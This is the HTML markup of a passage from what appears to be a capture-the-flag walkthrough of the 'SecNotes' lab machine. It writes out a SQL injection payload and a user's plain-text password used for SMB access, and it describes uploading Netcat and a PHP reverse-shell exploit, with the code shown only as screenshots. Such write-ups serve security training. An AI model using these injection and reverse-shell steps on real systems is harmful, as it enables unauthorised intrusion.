&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;https://bertwagner.com/2018/03/20/how-to-steal-data-using-a-second-order-sql-injection-attack/&quot;&gt;https://bertwagner.com/2018/03/20/how-to-steal-data-using-a-second-order-sql-injection-attack/&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Using &lt;b&gt;wfuzz&lt;/b&gt; to help us finding a valid SQL injection:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJlv4gyDZZr70xsnF_YUxZxMsMGhyRQZovA4OMxV-u2qcYzVBlGbGX9l4uksUSj_1D7941-qbtHrFHSOHces4AOyqUgoBmsa1CEiY25K315QxFFnbz5cmtLs-ZNS-MbW9t8NbVvOu0ikRf/s1600/screenshot.54.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJlv4gyDZZr70xsnF_YUxZxMsMGhyRQZovA4OMxV-u2qcYzVBlGbGX9l4uksUSj_1D7941-qbtHrFHSOHces4AOyqUgoBmsa1CEiY25K315QxFFnbz5cmtLs-ZNS-MbW9t8NbVvOu0ikRf/s1600/screenshot.54.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;- From the proposed queries the last one &lt;/span&gt;&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;b&gt;&#39; or 1=1 or &#39;&#39;=&#39;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;seems easy to apply:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibqP7LyPHlfR9JN6ZY5NcRR0p1UKcJlQGAftOkXo7fJ_kXTrhVZ38GanwJA4VeWPLARIRfZGDv-5nP7YXgxFn3hTP4MvGybzIFaoRIX3kBa136sa0csF_COl8-wLbRqLiajXrbka5i5Hwq/s1600/screenshot.57.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibqP7LyPHlfR9JN6ZY5NcRR0p1UKcJlQGAftOkXo7fJ_kXTrhVZ38GanwJA4VeWPLARIRfZGDv-5nP7YXgxFn3hTP4MvGybzIFaoRIX3kBa136sa0csF_COl8-wLbRqLiajXrbka5i5Hwq/s1600/screenshot.57.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Entering&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&#39; or 1=1 or &#39;&#39;=&#39; &lt;/b&gt;&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;as a new user and password, and later login with those credentials:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg88yuzyU803kplUNAI4Ysam4EuilylLz0g5mB7tiu204cdqCKNuDM2Ioq5aYxZSzKJsAvvncz7UOskLdhyYZ_EV4M7ug-fjRovJs-hTx7PvYwEaViw0b3ZKjNp-Yx2B-hoZvyJ26F7XUUd/s1600/screenshot.55.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg88yuzyU803kplUNAI4Ysam4EuilylLz0g5mB7tiu204cdqCKNuDM2Ioq5aYxZSzKJsAvvncz7UOskLdhyYZ_EV4M7ug-fjRovJs-hTx7PvYwEaViw0b3ZKjNp-Yx2B-hoZvyJ26F7XUUd/s1600/screenshot.55.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZeDoEVSpkJ8wA7zVcF8AzCNYBwgglQLe8JaaPCmZeJFh-7vEn_q8BlwTX3qppD3Ew2O-yUV-g6wlPU5ITOdc0iGZaQ_Uz2M7eADnrvRPZTQsP-Upos2_BvUqJzZtIzvp-2PSVqqkSfs3k/s1600/screenshot.56.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZeDoEVSpkJ8wA7zVcF8AzCNYBwgglQLe8JaaPCmZeJFh-7vEn_q8BlwTX3qppD3Ew2O-yUV-g6wlPU5ITOdc0iGZaQ_Uz2M7eADnrvRPZTQsP-Upos2_BvUqJzZtIzvp-2PSVqqkSfs3k/s1600/screenshot.56.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;- Now the home page yields credentials for user &lt;/span&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;tyler&lt;/b&gt;&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt; at the 3rd note named &lt;/span&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;new site:&lt;/b&gt;&lt;br /&gt;
&lt;b style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/b&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh95a1j2autop8X-ShWUqsilFyXlsN5HUXNkLleN7sq2chkx0pF3RkuLjyEXXH3FeSThC0npmdGATFQV9C4oeO95jLQeE-4zEdJB4n2hxstYq_7HVMue-wHGqg9CugSnUv_OWHcCNPyD0_h/s1600/screenshot.58.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh95a1j2autop8X-ShWUqsilFyXlsN5HUXNkLleN7sq2chkx0pF3RkuLjyEXXH3FeSThC0npmdGATFQV9C4oeO95jLQeE-4zEdJB4n2hxstYq_7HVMue-wHGqg9CugSnUv_OWHcCNPyD0_h/s1600/screenshot.58.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxPjZIBxLwtZhIUoyZ6kCFF_vAR_a8PPaiG2H6i22RpMZNvcckwP85zuqV6W6-dj79MOhHfT9PdbLzMjZrZqC73-tOUAx-vwq_KvH0_YK1uZpoBe-XmOEaVh45B7mNdxN0rU1gXlvTAe5c/s1600/screenshot.15.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxPjZIBxLwtZhIUoyZ6kCFF_vAR_a8PPaiG2H6i22RpMZNvcckwP85zuqV6W6-dj79MOhHfT9PdbLzMjZrZqC73-tOUAx-vwq_KvH0_YK1uZpoBe-XmOEaVh45B7mNdxN0rU1gXlvTAe5c/s400/screenshot.15.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #3d85c6;&quot;&gt;3.2 - Exploiting SMB&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;color: #3d85c6;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;- Using credentials &lt;b&gt;tyler:92g!mA8BGjOirkL%OG*&amp;amp;&lt;/b&gt; to access SMB service on port 445:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvxSMbVPtQ0MrLFF72_N7hQ4FqZdthi-ye1aAEi01OVyOmpUArza3hR5EqKF1xHrSZz-YBQPynQwWZMv4Ac6PkboAAcM5AGxu8aXRzh4WXSfauwwz2Llexq4Dy0lJ3Uw59c_2nH8W6ax40/s1600/screenshot.17.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvxSMbVPtQ0MrLFF72_N7hQ4FqZdthi-ye1aAEi01OVyOmpUArza3hR5EqKF1xHrSZz-YBQPynQwWZMv4Ac6PkboAAcM5AGxu8aXRzh4WXSfauwwz2Llexq4Dy0lJ3Uw59c_2nH8W6ax40/s1600/screenshot.17.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;- Connecting and listing &lt;b&gt;new-site&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3226c95Y-GkbVJYKkgiO9TYoCEmGlhbzYGEB07i0gGOrp-Gpkdjx4dr355aA8B_kv85kou3DLGxvUeWMtUhUuPxxdC7khGuOlzsHatG2NYdqoW16V4U5NA-Dpjw_Iv-LSmHsHTgVaQ_mq/s1600/screenshot.19.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3226c95Y-GkbVJYKkgiO9TYoCEmGlhbzYGEB07i0gGOrp-Gpkdjx4dr355aA8B_kv85kou3DLGxvUeWMtUhUuPxxdC7khGuOlzsHatG2NYdqoW16V4U5NA-Dpjw_Iv-LSmHsHTgVaQ_mq/s1600/screenshot.19.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUE0VFiQ_g7px1vbLahbeAqklsRl4xMR9pmEb6puXZX1j9zv5DlBSBdZvvHWY8z7JmPtylXyb88stueelqftzYq4xqKHIy2Z1xygjH6mQId9hvh39Zz9k85YWLWqz5MP-pvISNLmwWaLf_/s1600/screenshot.21.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUE0VFiQ_g7px1vbLahbeAqklsRl4xMR9pmEb6puXZX1j9zv5DlBSBdZvvHWY8z7JmPtylXyb88stueelqftzYq4xqKHIy2Z1xygjH6mQId9hvh39Zz9k85YWLWqz5MP-pvISNLmwWaLf_/s1600/screenshot.21.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- So we confirm that there is a web service at port 8808 where folder &lt;b&gt;new-site&lt;/b&gt; contains the image &lt;b&gt;iisstart.png.&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;3.3 - Getting a remote shell&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- First of all let&#39;s download to Kali the &lt;b&gt;Windows Netcat&lt;/b&gt; application:&lt;/span&gt;&lt;br /&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhkEhiHF7D6YXv0CSsI6bp1yDQId3FlzSFtvAb4Uqnj210Ki5lg0ihtfYcSZ8QKYG1fCOdV4shylYA2aFmPC86FXGRWsn6sDZY8bDT6utGsUE9HISw68z4ZYAz2gAIgieoaA4fW6RAyN4c/s1600/screenshot.22.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhkEhiHF7D6YXv0CSsI6bp1yDQId3FlzSFtvAb4Uqnj210Ki5lg0ihtfYcSZ8QKYG1fCOdV4shylYA2aFmPC86FXGRWsn6sDZY8bDT6utGsUE9HISw68z4ZYAz2gAIgieoaA4fW6RAyN4c/s1600/screenshot.22.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXFmJZYo6r2R4-va84SqoPByy9eUMTML4hp3irEG6RMiBHtOO7DH6rB-CsRuC2h7fWHoGAe3A6GI3HdVceEXjWYX7EbbZGbsqK0sL03lWnFhLGmcx9-_UW41z5I-hQI7ctRpkjtSRZ6-eS/s1600/screenshot.23.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXFmJZYo6r2R4-va84SqoPByy9eUMTML4hp3irEG6RMiBHtOO7DH6rB-CsRuC2h7fWHoGAe3A6GI3HdVceEXjWYX7EbbZGbsqK0sL03lWnFhLGmcx9-_UW41z5I-hQI7ctRpkjtSRZ6-eS/s1600/screenshot.23.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUIYiZGGM9zUVvO-4udpwmlk1vKF8E2IIsZZXf4NGokLcCrjJNvF3uheVCIgoBch3p6BkmyLL1y-UOqXBeqAPcOKwFWmDBbHiqzdTj-8wMxnfI4aMF79rm0B8wkxVbmJgb4ZOoCPB_9Ddu/s1600/screenshot.24.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUIYiZGGM9zUVvO-4udpwmlk1vKF8E2IIsZZXf4NGokLcCrjJNvF3uheVCIgoBch3p6BkmyLL1y-UOqXBeqAPcOKwFWmDBbHiqzdTj-8wMxnfI4aMF79rm0B8wkxVbmJgb4ZOoCPB_9Ddu/s1600/screenshot.24.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Also let&#39;s create &lt;b&gt;exploit.php&lt;/b&gt;, a PHP exploit which goal is to spawn a remote shell&amp;nbsp; with a Netcat connection:&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN79XY548CiHkgZUM5bZY8mAb930dGNThvVFDAnpws3hkf313vgUlycoTi45rj0wKHOKd7BebhUWqIwqtUrCHPND57vU3w2egd0hQXQgjgAZ9h2Yncs7rqfYObrkS0lqV9qDj03f-ksiv_/s1600/screenshot.25.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN79XY548CiHkgZUM5bZY8mAb930dGNThvVFDAnpws3hkf313vgUlycoTi45rj0wKHOKd7BebhUWqIwqtUrCHPND57vU3w2egd0hQXQgjgAZ9h2Yncs7rqfYObrkS0lqV9qDj03f-ksiv_/s1600/screenshot.25.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Transferring&amp;nbsp;&lt;b&gt;nc.exe&lt;/b&gt; and &lt;b&gt;exploit.php&lt;/b&gt; from &lt;b&gt;Kali&lt;/b&gt; to &lt;b&gt;SecNotes&lt;/b&gt;:&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik5l2iGiyuWubA2BJnke0bhUz9yr9E_GE6JuHB7PY_UUZ_tIcnjuoVnGXU73DtrwB4_32LcuOAd7CYpcq-1NIeOJq50DkhCx4TK8te_TFMe-74a1REgufHmaCY6jE6uSfsPK-vcboJJH6l/s1600/screenshot.26.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik5l2iGiyuWubA2BJnke0bhUz9yr9E_GE6JuHB7PY_UUZ_tIcnjuoVnGXU73DtrwB4_32LcuOAd7CYpcq-1NIeOJq50DkhCx4TK8te_TFMe-74a1REgufHmaCY6jE6uSfsPK-vcboJJH6l/s1600/screenshot.26.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The transfer of both files is successful:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLo2CpfyzAH-NvTg9RsTPS6HCsOllR_Fk5V_TAr-7B0OaWIBOk5IPNfSw8US-S2nhkMEIu9QQpQFjaWUbwv0yfXYFlD12PI1jnG65GZATCT-4lc8iONQWmKqe8cXfyXcExK-6AucZPS6iK/s1600/screenshot.34.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLo2CpfyzAH-NvTg9RsTPS6HCsOllR_Fk5V_TAr-7B0OaWIBOk5IPNfSw8US-S2nhkMEIu9QQpQFjaWUbwv0yfXYFlD12PI1jnG65GZATCT-4lc8iONQWmKqe8cXfyXcExK-6AucZPS6iK/s1600/screenshot.34.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Setting a Netcat listening on port 5555:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3fH2aqiZpKEEauTNQE-0TbunRpdwaAXOyGdSAs4vQQaB4i8ZRr_vlQWbcx5z2u8I_3fmoDDNuqT9TcmANZLgm7BGlwU7W_7t1xr8UO_-bXdsk6au3hsiopI1N-6Zjiu2N3FU54kL5UPG1/s1600/screenshot.27.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3fH2aqiZpKEEauTNQE-0TbunRpdwaAXOyGdSAs4vQQaB4i8ZRr_vlQWbcx5z2u8I_3fmoDDNuqT9TcmANZLgm7BGlwU7W_7t1xr8UO_-bXdsk6au3hsiopI1N-6Zjiu2N3FU54kL5UPG1/s1600/screenshot.27.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
